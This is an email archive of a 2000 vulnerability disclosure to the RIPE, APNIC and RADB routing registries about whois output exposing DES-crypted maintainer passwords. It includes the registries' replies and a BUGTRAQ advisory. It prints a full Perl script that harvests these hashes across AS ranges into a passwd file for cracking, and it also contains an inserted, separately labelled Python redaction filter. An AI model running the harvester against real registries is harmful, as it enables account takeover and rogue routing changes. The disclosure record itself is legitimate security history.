 *     Gerald> Your characterization of my comments is true.  However, I
 *     Gerald> had much more to say.  I will forward my original response
 *     Gerald> after this email so that others can draw their own
 *     Gerald> conclusions.
 * 
 *     >> While I agree that users (in general) should be given what they
 *     >> want, I would still not (for example) allow a password-less
 *     >> account as a Unix system administrator.
 * 
 *     Gerald> This is an unfair analogy.  The relationship between a
 *     Gerald> Unix sysadmin and his network is very much different
 *     Gerald> between an entire community of users and the registries.
 * 
 *     Gerald> A sysadmin simply su's and makes whatever changes are
 *     Gerald> desired.  In contrast, changes to the technology used at
 *     Gerald> the registries come about from the open standards process.
 *     Gerald> This means changes take place at a slower pace through the
 *     Gerald> meetings and with approval from the entire community.  The
 *     Gerald> reason for this is to avoid dictatorship and general
 *     Gerald> anarchy.  The price for this is a slower migration path
 *     Gerald> for changes.
 * 
 *     >> I have yet to evaluate the extent of damage that a person with
 *     >> a cracked APNIC, RIPE or RADB password could do, but I suspect
 *     >> that it could be pretty serious, at least in the short term.
 * 
 *     Gerald> Very true.
 * 
 *     >> Please allow me to reiterate that the policy of displaying
 *     >> CRYPT-PW passwords without control is viewed by me personally
 *     >> with great concern, and I suspect that that is the view most
 *     >> security professionals also would take.  My objective is to
 *     >> have a secure, stable Internet, and I'm willing to do anything
 *     >> in power to work towards this goal.  If one of those tasks is
 *     >> to bring potential security holes into the limelight,
 * 
 *     Gerald> Very true.  However, your remark is akin to me making an
 *     Gerald> Internet announcement something like, "SNMP v1 community
 *     Gerald> strings are transmitted in cleartext.  This is terrible!
 *     Gerald> You have 1 week to fix it and then I'm going public."
 *     Gerald> It's old news.  We all know it and dislike it as much as
 *     Gerald> you.
 * 
 *     Gerald> And what about "MAIL-FROM" authentication?  You do not
 *     Gerald> include this in your remarks.  Certainly your observations
 *     Gerald> would be more potent by adding "MAIL-FROM".
 * 
 *     Gerald> Have you read RFC 2726?  Do you realize that all users can
 *     Gerald> use this form of authentication?
 * 
 *     >> I shall do that (by posting to BUGTRAQ and CERT, albeit
 *     >> reluctantly); before that, however, I would request you again
 *     >> to fix the problem at the source rather than have half the
 *     >> script-kiddies in the world trying to attack your databases,
 *     >> and maybe succeeding.
 * 
 *     Gerald> The registries will not unilaterally go into the
 *     Gerald> databases and change data or implement new security
 *     Gerald> features without the approval of the community.  What you
 *     Gerald> are suggesting won't work anyway (ie, you still have the
 *     Gerald> "MAIL-FROM" problem).
 * 
 *     Gerald> We are all sympathetic to your criticism.  In fact the
 *     Gerald> RIPE NCC and myself have gotten up numerous times at
 *     Gerald> public forums (ripe, ietf, ...)  and urged the public to
 *     Gerald> convert to PGP authentication.  The registries agree with
 *     Gerald> you but real change must come from the community.
 * 
 *     Gerald> I would suggest to you to come to the meetings and make
 *     Gerald> your proposal.  I'm sure you will have *many* supporters.
 * 
 *     Gerald> --Gerald Winters
 * 
 * --[[application/octet-stream
 * Content-Disposition: attachment; filename="who.pl"][quoted-printable]]
 * #!/usr/bin/perl -w
 * #
 * # Brute force create a /etc/passwd-like file with DES-encrypted passwords
 * # from dumb whois lookups on RIPE and APNIC.  Can be easily modified
 * # to handle RADB too.  Once the file is created, run Crack (or your favourite
 * # DES-crack program) on it and create some headache for the ``Internet
 * # community'' which has decided to reveal DES-encoded passwords as part
 * # of a whois lookup on a maintainer object.
 * #
 * # Copyright 2000, Raju Mathur <raju@linux-delhi.org>, <raju@kandalaya.org>
 * #
 * # This program is available under the terms of the GNU General Public License
 * #
 * use strict ;
 * #
 * # Currently will work on RIPE and APNIC
 * #
 * my
 *   $count =3D 0 ;
 * my
 *   $outfile =3D shift ;
 * my
 *   $registry =3D shift ;
 * if ( !defined $outfile || !defined $registry
 *      || $registry !~ /apnic/i && $registry !~ /ripe/i )
 * {
 *   print STDERR "usage: $0 output-file APNIC|RIPE [start AS] [end AS]\n" ;=
 * 
 *   exit 1 ;
 * }
 * open OUT , ">$outfile"
 *   or die "Cannot write to $outfile: $!\n" ;
 * my
 *   $startas =3D shift ;
 * $startas =3D 1
 *   if !defined $startas ;
 * my
 *   $endas =3D shift ;
 * $endas =3D 12000
 *   if !defined $endas ;
 * my
 *   $server =3D "whois.apnic.net" ;
 * $server =3D "whois.ripe.net"
 *   if $registry =3D~ /ripe/i ;
 * my
 *   $maintainer ;
 * my
 *   $descr ;
 * my
 *   $notify ;
 * my
 *   $auth ;
 * my
 *   $passwd ;
 * foreach my $i ( $startas..$endas )
 * {
 *   print "*** AS$i\n" ;
 *   open WHOIS , "whois AS$i\@$server|"
 *     or die "Cannot whois AS$i: $!\n" ;
 *   while ( <WHOIS> )
 *   {
 *     if ( /^mnt-by:\s*(.*)/ )
 *     {
 *       $maintainer =3D $1 ;
 *       last ;
 *     }
 *   }
 *   close WHOIS ;
 *   next
 *     if !$maintainer ;
 *   print "*** $maintainer\n" ;
 *   open WHOIS , "whois $maintainer\@$server|"
 *     or die "Cannot whois $maintainer: $!\n" ;
 *   $descr =3D "" ;
 *   while ( <WHOIS> )
 *   {
 *     if ( $_ =3D~ /^descr:\s*(.*)/ )
 *     {
 *       $descr .=3D "$1, " ;
 *     }
 *     if ( $_ =3D~ /^mnt-nfy:\s*(.*)/ )
 *     {
 *       $notify =3D $1 ;
 *     }
 *     if ( $_ =3D~ /^auth:\s*(.*)/ )
 *     {
 *       $auth =3D $1 ;
 *     }
 *     last if $auth && $auth =3D~ /crypt-pw/i ;
 *   }
 *   next
 *     if !$auth || $auth !~ /crypt-pw/i ;
 * print "*** <$descr> <$notify> <$auth>\n" ;
 *   close WHOIS ;
 *   $auth =3D~ /.*crypt-pw\s*(.*)/i ;
 *   $passwd =3D $1 ;
 *   $descr =3D~ s/[\n:]//g ;
 *   $notify =3D~ s/://g ;
 *   print OUT "$maintainer:$passwd:42:42:$descr:/dev/null:/bin/sh\n" ;
 *   $auth =3D "" ;
 *   $count++ ;
 * }
 * close OUT ;
 * print "$count records\n" ;
 * 


--- Headers Follow ---

>From info@apnic.net  Sat Dec  2 03:39:21 2000
Received: (from info@localhost)
	by hadrian.staff.apnic.net (8.9.3/8.9.3) id DAA04393
	for technical-ticket; Sat, 2 Dec 2000 03:39:21 +1000 (EST)
Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254])
	by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id DAA04389
	for <technical@staff.apnic.net>; Sat, 2 Dec 2000 03:39:20 +1000 (EST)
Received: (from mail@localhost)
	by guardian.apnic.net (8.9.3/8.9.3) id DAA26188
	for <technical@staff.apnic.net>; Sat, 2 Dec 2000 03:39:31 +1000 (EST)
Received: from whois1.apnic.net(203.37.255.98) by int-gw.staff.apnic.net via smap (V2.1)
	id xma026186; Sat, 2 Dec 00 03:39:10 +1000
Received: from birch.ripe.net (birch.ripe.net [193.0.1.96])
	by ns.apnic.net (8.9.3/8.9.3) with ESMTP id DAA99438
	for <technical@apnic.net>; Sat, 2 Dec 2000 03:39:08 +1000 (EST)
Received: from ripe.net (office.ripe.net [193.0.1.97])
	by birch.ripe.net (8.8.8/8.8.8) with ESMTP id SAA10340;
	Fri, 1 Dec 2000 18:39:00 +0100 (CET)
Message-Id: <200012011739.SAA10340@birch.ripe.net>
To: raju@linux-delhi.org
cc: technical@apnic.net (Bruce Campbell via RT), db-admin@radb.net,
        irrd-team@merit.edu, gerald@merit.edu (Gerald Andrew Winters)
Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects 
In-reply-to: Your message of Thu, 30 Nov 2000 11:00:19 +0530.
             <14885.58859.501931.193491@localhost.localdomain> 
References: <14885.58859.501931.193491@localhost.localdomain> 
From: RIPE Database Administration <ripe-dbm@ripe.net>
X-Organization: RIPE Network Coordination Centre
X-Phone: +31 20 535 4444
X-Fax: +31 20 535 4445
Date: Fri, 01 Dec 2000 18:39:00 +0100
Sender: ripe-dbm@ripe.net

-------------------------------------------- Managed by Request Tracker

From BUGTRAQ@SECURITYFOCUS.COM  Thu Dec  7 07:40:54 2000
X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil]
	["8514" "Wednesday" "6" "December" "2000" "09:43:52" "+0530" "Raju Mathur" "raju@LINUX-DELHI.ORG" nil "184" "RIPE, APNIC, RADB update insecurities [re: [APNIC #62050]]" "^From:" nil nil "12" nil nil (number " " mark "     Raju Mathur       Dec  6  184/8514  " thread-indent "\"RIPE, APNIC, RADB update insecurities [re: [APNIC #62050]]\"\n") nil nil]
	nil)
Return-Path: <BUGTRAQ@SECURITYFOCUS.COM>
Received: from localhost (IDENT:raju@localhost [127.0.0.1])
	by ganwaar.com (8.9.3/8.9.3) with ESMTP id HAA02238
	for <raju@localhost>; Thu, 7 Dec 2000 07:40:53 +0530
X-POP3-Rcpt: raju@linux-delhi.org
Received: from linux-delhi.org
	by localhost with POP3 (fetchmail-5.3.1)
	for raju@localhost (single-drop); Thu, 07 Dec 2000 07:40:53 +0530 (IST)
Received: from lists.securityfocus.com (lists.securityfocus.com [207.126.127.68])
	by biznetindia.com (8.10.2/8.10.2) with ESMTP id eB6LlQ509854
	for <raju@LINUX-DELHI.ORG>; Wed, 6 Dec 2000 16:47:27 -0500
Received: from lists.securityfocus.com (lists.securityfocus.com [207.126.127.68])
	by lists.securityfocus.com (Postfix) with ESMTP
	id E553F24D203; Wed,  6 Dec 2000 12:26:29 -0800 (PST)
Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM
          (LISTSERV-TCP/IP release 1.8d) with spool id 19644600 for
          BUGTRAQ@LISTS.SECURITYFOCUS.COM; Wed, 6 Dec 2000 12:25:40 -0800
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78]) by
          lists.securityfocus.com (Postfix) with SMTP id 1AB0E24C680 for
          <bugtraq@lists.securityfocus.com>; Tue,  5 Dec 2000 20:14:44 -0800
          (PST)
Received: (qmail 21794 invoked by alias); 6 Dec 2000 04:14:39 -0000
Delivered-To: bugtraq@securityfocus.com
Received: (qmail 21791 invoked from network); 6 Dec 2000 04:14:38 -0000
Received: from delhi1.mtnl.net.in (203.94.243.51) by mail.securityfocus.com
          with SMTP; 6 Dec 2000 04:14:38 -0000
Received: from ganwaar.com by delhi1.mtnl.net.in
          (8.9.1/1.1.20.3/07Jul00-0916AM) id JAA0000019267; Wed, 6 Dec 2000
          09:41:23 +0530 (IST)
Received: (from raju@localhost) by ganwaar.com (8.9.3/8.9.3) id JAA07043; Wed,
          6 Dec 2000 09:43:57 +0530
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid
Message-ID:  <14893.48384.188897.231214@localhost.localdomain>
Reply-To: raju@LINUX-DELHI.ORG
X-cc:         Bruce Campbell via RT <technical@apnic.net>,
              ripe-dbm@ripe.net, db-admin@radb.net, irrd-team@merit.edu,
              Gerald Andrew Winters <gerald@merit.edu>
From: Raju Mathur <raju@LINUX-DELHI.ORG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject:      RIPE, APNIC, RADB update insecurities [re: [APNIC #62050]]
Date:         Wed, 6 Dec 2000 09:43:52 +0530
Status: RO

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I found the following potential issues in the top-level routing
registries:


DISCLAIMER
- ----------

Raju Mathur is not responsible for the misuse of any of the
information and/or program(s) present in this message.  The message
and program(s) are provided as a service to the Internet community.
Raju Mathur is not liable for any damages, direct or indirect, caused
by the information or program(s) present in this advisory.

BACKGROUND
- ----------

The Routing Registries maintain databases of all routing information
including Autonomous System Numbers and IN-ADDR.ARPA reverse lookups.
The registries display DES-encrypted passwords to the general public,
and the database update process is prone to being cracked.

VENDOR CONTACT
- --------------

Contacted RIPE, APNIC and RADB on 25 November, 2000.  Responses
indicate that the database format and information revealed were
decided by the community and cannot be changed until the community as
a whole votes to change them.  I have a copy of the complete
correspondence if anyone's interested.

UPDATE PROCESS
- --------------

If you are a maintainer for an AS or an IN-ADDR.ARPA domain, you can
use any of the following methods to update information about your
records (this is from my personal understanding, there could be minor
differences between different registries):

1. NONE.  You send updates by e-mail or through a web form to the
registry, which are reviewed by the hostmaster and applied if they are
syntactically and semantically OK.

2. MAIL-FROM.  You send updates by e-mail or through the web form to
the registry, which makes syntax and semantic checks and contacts you
on your registered e-mail address.  Once you reply in the affirmative,
the updates are applied.

3. CRYPT-PW.  The web forms allow you to apply semantically correct
updates immediately if you choose CRYPT-PW as your authentication
method.  You only need your password to change the database.  There is
no human review of the update.

4. PGP.  You send a PGP-signed message to the hostmaster, who verifies
that the signature is correct, makes syntax and semantic checks and
updates the database.

ISSUES
- ------

I'm not going to go into problems associated with MAIL-FROM and NONE
authentication methods since (a) they have already been thrashed out
in the context of the domain registries and (b) they require human
intervention at some point.  PGP also seems quite safe (as safe as
using PGP is).

The CRYPT-PW method of update is of interest here.  Essentially anyone
who manages to get hold of your plaintext CRYPT-PW (which uses DES as
the encryption method) can masquerade as you and make changes to the
databases without any other human intervention at all.  This can lead
to serious security and network outage issues in the short term.  So
far I thought that long-term implications were minimal since the
original maintainer would be notified about rogue changes, but I'm not
too sure about what happens if you change the maintainer's contact
address also.

The problem is that the registries are constrained by their users to
reveal the CRYPT'ed password to the general public through a simple
whois mechanism.  Doing a whois on the maintainer object in a registry
reveals the CRYPT'ed password if s/he has one, after which there are
any number of tools which would permit you to attempt to crack or
brute-force the password.

EXPLOIT
- -------

Not really an exploit, but the attached Perl script (which has been
tested on Linux with fwhois) will help you to extract DES-encrypted
passwords from maintainer objects related to a range of Autonomous
System Numbers (ASN's) and put them into a Unix-style password file
which can be fed to Crack & co. for further ``processing''.

Run it as:

    who.pl output-file APNIC|RIPE start-asn end-asn

where output-file will be the file with the Unix-style passwd
information including the encrypted password, APNIC or RIPE are which
registry you wish to glean passwords from (it's trivial to modify the
program to glean passwords from RADB) and start- and end-asn's define
the block of AS numbers whose maintainer objects you are trying to
extract passwords from.

SOLUTIONS
- ---------

Solutions exist at a number of levels:

1. Personal.  Do not use CRYPT-PW as your authentication mechanism if
you are a maintainer.  All the registries recommend the use of PGP and
will help you get started with PGP if you need that.

2. Community.  Take a decision not to display the authentication
mechanism to the general public, especially the encrypted passwords.
It should be trivial to change the whois server code to conceal the
passwords.

3. Registry.  Encourage all your users to switch to a more secure
method of sending updates.  Define a date by which all users must
switch.  Remove the ``NONE'' authentication method altogether.  For
MAIL-FROM use unique, random identifiers for each request which must
be present in the update confirmation message.

Regards,

- -- Raju

- --[[application/octet-stream
Content-Disposition: attachment; filename="who.pl"][base64]]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>

iEYEARECAAYFAjotvCEACgkQyWjQ78xo0X94dACfcsDJ3l0Bmcyx1lsLJiTGBR1P
Y64An3DG7QZV0wsFlzArEDiUOQJdQEt7
=kjtc
-----END PGP SIGNATURE-----
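
Solution 2 in the advisory above (conceal the encrypted password in whois output) can be sketched as an output filter, with a helper that lists maintainers still on CRYPT-PW for the outreach in Solution 3. This is an added example, not code from the advisory or from any registry's whois server; the `# Filtered` marker, the function names and the sample objects are assumptions constructed for illustration.

```python
import re

# Schemes whose published value is derived from a secret. CRYPT-PW is the one
# the advisory names; extending this set is an assumption about local policy.
SECRET_SCHEMES = {"CRYPT-PW"}
FILTERED = "# Filtered"  # constructed marker text, not a registry standard

# "name: value" attribute line; continuation lines start with space, tab or "+".
ATTR = re.compile(r"^(?P<name>[A-Za-z][A-Za-z0-9-]*):(?P<pad>[ \t]*)(?P<value>.*)$")

# Constructed sample output; names and hash strings are placeholders.
SAMPLE = """\
% constructed whois output, not real registry data
mntner:      MAINT-EXAMPLE-ONE
descr:       Example Networks
mnt-nfy:     noc@example.net
auth:        CRYPT-PW aaEXAMPLEHASH
auth:        PGPKEY-0123ABCD

mntner:      MAINT-EXAMPLE-TWO
auth:        crypt-pw
             bbEXAMPLEHASH
mnt-by:      MAINT-EXAMPLE-TWO

mntner:      MAINT-EXAMPLE-THREE
auth:        PGPKEY-89ABCDEF
"""


def filter_whois(text):
    """Return (filtered_text, redacted_count) for whois output.

    Only 'auth:' attributes that use a scheme in SECRET_SCHEMES are changed.
    The scheme name stays visible so readers can still see how an object is
    protected; the hash is dropped, including any continuation lines of the
    same attribute (a hash folded onto the next line must not leak).
    """
    out = []
    redacted = 0
    dropping = False  # True while skipping continuation lines of a redacted auth
    for line in text.splitlines():
        if line[:1] in (" ", "\t", "+"):
            if not dropping:
                out.append(line)
            continue
        dropping = False
        m = ATTR.match(line)
        if m and m.group("name").lower() == "auth":
            parts = m.group("value").split(None, 1)
            scheme = parts[0].upper() if parts else ""
            if scheme in SECRET_SCHEMES:
                out.append(f"{m.group('name')}:{m.group('pad')}{scheme} {FILTERED}")
                redacted += 1
                dropping = True
                continue
        out.append(line)
    tail = "\n" if text.endswith("\n") else ""
    return "\n".join(out) + tail, redacted


def weak_maintainers(text):
    """List mntner names that still use a scheme in SECRET_SCHEMES.

    Works on filtered output as well, because the scheme name is preserved.
    """
    found = []
    current = None
    for line in text.splitlines():
        if not line.strip():
            current = None  # blank line ends the current object
            continue
        m = ATTR.match(line)
        if not m:
            continue  # comment or continuation line
        name, value = m.group("name").lower(), m.group("value")
        if name == "mntner":
            current = value.split("#")[0].strip()
        elif name == "auth" and current:
            parts = value.split(None, 1)
            if parts and parts[0].upper() in SECRET_SCHEMES and current not in found:
                found.append(current)
    return found


if __name__ == "__main__":
    filtered, count = filter_whois(SAMPLE)
    print(filtered)
    print(f"{count} auth value(s) filtered; still on a password scheme:",
          ", ".join(weak_maintainers(filtered)))
```
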

From raju Sat Nov 25 10:46:39 2000
From: Raju Mathur <raju@linux-delhi.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14879.19255.567069.418332@localhost.localdomain>
Date: Sat, 25 Nov 2000 10:46:39 +0530 (IST)
To: webmaster@apnic.net
Subject: Crypted passwords for maintainer objects
X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid
Reply-To: raju@linux-delhi.org
Status: RO

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I see that doing a whois on a maintainer object in your whois database
reveals the DES-encrypted password of the maintainer.  As you are
aware, it is trivial to brute-force crack (decode) a DES password, and
this is a serious security hole in your service.  Please treat this as
a critical issue and refrain from revealing the DES-encrypted password
in whois lookups.

I shall be going public with this information in one week.  Request
you to have fixed the problem by then.

Regards,

- -- Raju Mathur
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>

iEYEARECAAYFAjofSxAACgkQyWjQ78xo0X+1YACeOxPCthdC/jah0K3JoJFbdPNi
/SkAnjdq+7pYmV5YcuoO/laYulSC56Kt
=HmKH
-----END PGP SIGNATURE-----

From raju Sat Nov 25 13:19:05 2000
From: Raju Mathur <raju@linux-delhi.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14879.28401.445564.476080@localhost.localdomain>
Date: Sat, 25 Nov 2000 13:19:05 +0530 (IST)
To: webmaster@ripe.net, ncc@ripe.net
Subject: Crypted passwords for maintainer objects
X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid
Reply-To: raju@linux-delhi.org
Status: RO

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I see that doing a whois on a maintainer object in your whois database
reveals the DES-encrypted password of the maintainer if s/he is using
password as his/her authentication scheme.  As you are aware, it is
trivial to brute-force crack (decode) a DES password, and this is a
serious security hole in your service.  Please treat this as a
critical issue and refrain from revealing the DES-encrypted password
in whois lookups.

I shall be going public with this information in one week.  Request
you to have fixed the problem by then.

Regards,

- -- Raju Mathur
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>

iEYEARECAAYFAjofbtUACgkQyWjQ78xo0X/gtwCgjRMfSEBwGhjJN7pN+/bG47Ob
6zcAn0IhxrFwqqmAybUmqcdl5I3XJljz
=zRSe
-----END PGP SIGNATURE-----

From raju Sat Nov 25 14:53:34 2000
From: Raju Mathur <raju@linux-delhi.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14879.34070.278516.159670@localhost.localdomain>
Date: Sat, 25 Nov 2000 14:53:34 +0530 (IST)
To: db-admin@radb.net, www@merit.edu
Subject: Crypted passwords for maintainer objects
X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid
Reply-To: raju@linux-delhi.org
Status: RO

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I see that doing a whois on a maintainer object in your whois database
reveals the DES-encrypted password of the maintainer if s/he is using
password as his/her authentication scheme.  As you are aware, it is
trivial to brute-force crack (decode) a DES password, and this is a
serious security hole in your service.  Please treat this as a
critical issue and refrain from revealing the DES-encrypted password
in whois lookups.

I shall be going public with this information in one week.  Request
you to have fixed the problem by then.

Regards,

- -- Raju Mathur
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>

iEYEARECAAYFAjofhQsACgkQyWjQ78xo0X/ypQCfS4NkeuyRMD9Qshx743dgVt1z
FmMAn3e/ahXFjLVuVGu02KvkdHjDx/kK
=SPnT
-----END PGP SIGNATURE-----

From raju Mon Nov 27 13:17:01 2000
From: Raju Mathur <raju@linux-delhi.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14882.4469.52414.25633@localhost.localdomain>
Date: Mon, 27 Nov 2000 13:17:01 +0530 (IST)
To: Bruce Campbell via RT <technical@apnic.net>
Cc: ripe-dbm@ripe.net, gerald@merit.edu (Gerald Andrew Winters), db-admin@radb.net, irrd-team@merit.edu
Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects
In-Reply-To: <200011270657.QAA25403@hadrian.staff.apnic.net>
References: <200011270657.QAA25403@hadrian.staff.apnic.net>
X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid
Reply-To: raju@linux-delhi.org
Status: RO

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi Bruce,

I've already sent a copy of this mail to RIPE and RADB.  RADB's reply
basically states that ``it's what the users want, so our hands are
tied'', which isn't very heartening.  I'm still awaiting a response
from RIPE.

While I agree that users (in general) should be given what they want,
I would still not (for example) allow a password-less account as a
Unix system administrator.  I have yet to evaluate the extent of
damage that a person with a cracked APNIC, RIPE or RADB password could
do, but I suspect that it could be pretty serious, at least in the
short term.  I presume that even if someone manages to change an
object in your database the owner/maintainer of that object would
still be notified and have the option of correcting the issue; however
even a short-term rogue change in the database can have global routing
and security implications (e.g. a change in the in-addr.arpa database
could be the precursor for major security breaches).

Please allow me to reiterate that the policy of displaying CRYPT-PW
passwords without control is viewed by me personally with great
concern, and I suspect that that is the view most security
professionals also would take.  My objective is to have a secure,
stable Internet, and I'm willing to do anything in power to work
towards this goal.  If one of those tasks is to bring potential
security holes into the limelight, I shall do that (by posting to
BUGTRAQ and CERT, albeit reluctantly); before that, however, I would
request you again to fix the problem at the source rather than have
half the script-kiddies in the world trying to attack your databases,
and maybe succeeding.

Regards,

- -- Raju

>>>>> "Bruce" == Bruce Campbell via RT <technical@apnic.net> writes:

    Bruce> raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36):
    >> I see that doing a whois on a maintainer object in your whois
    >> database reveals the DES-encrypted password of the maintainer.
    >> As you are aware, it is trivial to brute-force crack (decode) a
    >> DES password, and this is a serious security hole in your
    >> service.  Please treat this as a critical issue and refrain
    >> from revealing the DES-encrypted password in whois lookups.

    Bruce> The APNIC Whois Databases uses code developed by our sister
    Bruce> organisation for Europe (the RIPE NCC) and shares many of
    Bruce> the same issues.  The issue regarding the visibility of the
    Bruce> 'auth' attribute in the maintainer object has been
    Bruce> discussed before, however I regret that I am unable to find
    Bruce> an online reference for this discussion.

    Bruce> I am cc'ing the appropriate address in the RIPE NCC in the
    Bruce> hopes that they can provide a more definitive reference ( a
    Bruce> reply to the APNIC ticketing system will also reply to the
    Bruce> original requestor ).

    >> I shall be going public with this information in one week.
    >> Request you to have fixed the problem by then.

    Bruce> Kind regards,

    Bruce> -- Bruce Campbell <bruce.campbell@apnic.net>
    Bruce> +61-7-3367-0490 Systems Administrator Regional Internet
    Bruce> Registry Asia Pacific Network Information Centre For the
    Bruce> Asia Pacific Region http://www.apnic.net/db/
    Bruce> whois.APNIC.net



    Bruce> -------------------------------------------- Managed by
    Bruce> Request Tracker
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard <http://www.gnupg.org/>

iEYEARECAAYFAjoiEKgACgkQyWjQ78xo0X/OewCeO209lBqSTBrlWms8j81Lmxtb
vhoAnjvjbJHfE7QQ4scbd8q3ri5bokPF
=mKDL
-----END PGP SIGNATURE-----

From raju Thu Nov 30 11:00:19 2000
From: Raju Mathur <raju@linux-delhi.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14885.58859.501931.193491@localhost.localdomain>
Date: Thu, 30 Nov 2000 11:00:19 +0530 (IST)
To: RIPE Database Administration  via RT <technical@apnic.net>
Cc: technical@apnic.net (Bruce Campbell via RT),
    ripe-dbm@ripe.net,
    db-admin@radb.net,
    irrd-team@merit.edu, gerald@merit.edu (Gerald Andrew Winters)
Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects 
In-Reply-To: <200011291033.UAA16435@hadrian.staff.apnic.net>
References: <200011291033.UAA16435@hadrian.staff.apnic.net>
X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid
Reply-To: raju@linux-delhi.org
Status: RO

[Munging two messages into one reply to keep everyone in sync]

Hi Gerald, Mr/Ms Magee,

Calculate cost of 1% of maintainer objects in the databases getting
perverted using a script like the attached one.  Weigh against cost of
public outcry if you unilaterally decide to not reveal auth schemes in
whois lookups.  Decide which is cheaper.

I'm not going public with the script until either a deadline for
changing the whois behaviour determined by you passes, or you decide
not to make such a deadline.

Regards,

-- Raju

>>>>> "RIPE" == RIPE Database Administration via RT <technical@apnic.net> writes:

    RIPE> Dear Raju Mathur, This matter was originally raised in
    RIPE> October 1994, when the RIPE document ripe-120
    RIPE> (ftp://ftp.ripe.net/ripe/docs/ripe-120.txt) was published:

    RIPE> "It is by no means meant to keep out a determined malicious
    RIPE> attacker. The crypt function is vulnerable to exhaustive
    RIPE> search by (lots of) fast machines and programs to do the
    RIPE> searching are widely available.  For this reason it is
    RIPE> strongly discouraged to use encrypted passwords also used
    RIPE> for other purposes such as Unix login accounts in this
    RIPE> scheme. As you are publishing the encrypted password in the
    RIPE> database it is open to attack."

    RIPE> This was re-stated in ripe-153 (published in January 1997)
    RIPE> and in ripe-157 (published in May 1997).  In November 1998,
    RIPE> ripe-189 was published, in which the RIPE NCC announced that
    RIPE> it was supporting PGP authentication in the RIPE Database
    RIPE> (the scheme is also described in RFC-2726).  In January
    RIPE> 1999, the RIPE NCC published ripe-190, offering free PGP
    RIPE> licences on request, to anyone who had a mntner object in
    RIPE> the RIPE Database.  At every RIPE Meeting since that time,
    RIPE> the RIPE NCC has encouraged the RIPE community to adopt PGP
    RIPE> authentication.

    RIPE> The RIPE NCC does not manage the data in the RIPE Network
    RIPE> Management Database.  The responsibility for maintaining and
    RIPE> protecting the data is with those who put the data in there.
    RIPE> However, the RIPE NCC has provided a PGP authentication
    RIPE> scheme and encourages its use.

    RIPE> You give a one-week deadline before you make a public
    RIPE> statement about this.  We cannot unilaterally change the
    RIPE> functionality of the RIPE Database; we only act on the
    RIPE> instructions of the RIPE Database Working Group, which has a
    RIPE> mailing list: <db-wg@ripe.net>.  We invite you to express
    RIPE> your concerns on that list.

    RIPE> BTW, this is the first message from you that I have seen.  I
    RIPE> am investigating if we received any other message from you
    RIPE> previous to this one.

    RIPE> If you have any more questions, please contact
    RIPE> <ripe-dbm@ripe.net>.

    RIPE> Kind regards,

    RIPE> A. M. R. Magee ______________ RIPE NCC




    RIPE> --- Headers Follow ---

    >> From info@apnic.net Wed Nov 29 20:33:24 2000
    RIPE> Received: (from info@localhost) by hadrian.staff.apnic.net
    RIPE> (8.9.3/8.9.3) id UAA16430 for technical-ticket; Wed, 29 Nov
    RIPE> 2000 20:33:24 +1000 (EST) Received: from guardian.apnic.net
    RIPE> (int-gw.staff.apnic.net [192.168.1.254]) by
    RIPE> hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id UAA16426
    RIPE> for <technical@staff.apnic.net>; Wed, 29 Nov 2000 20:33:24
    RIPE> +1000 (EST) Received: (from mail@localhost) by
    RIPE> guardian.apnic.net (8.9.3/8.9.3) id UAA29609 for
    RIPE> <technical@staff.apnic.net>; Wed, 29 Nov 2000 20:33:24 +1000
    RIPE> (EST) Received: from whois1.apnic.net(203.37.255.98) by
    RIPE> int-gw.staff.apnic.net via smap (V2.1) id xma029607; Wed, 29
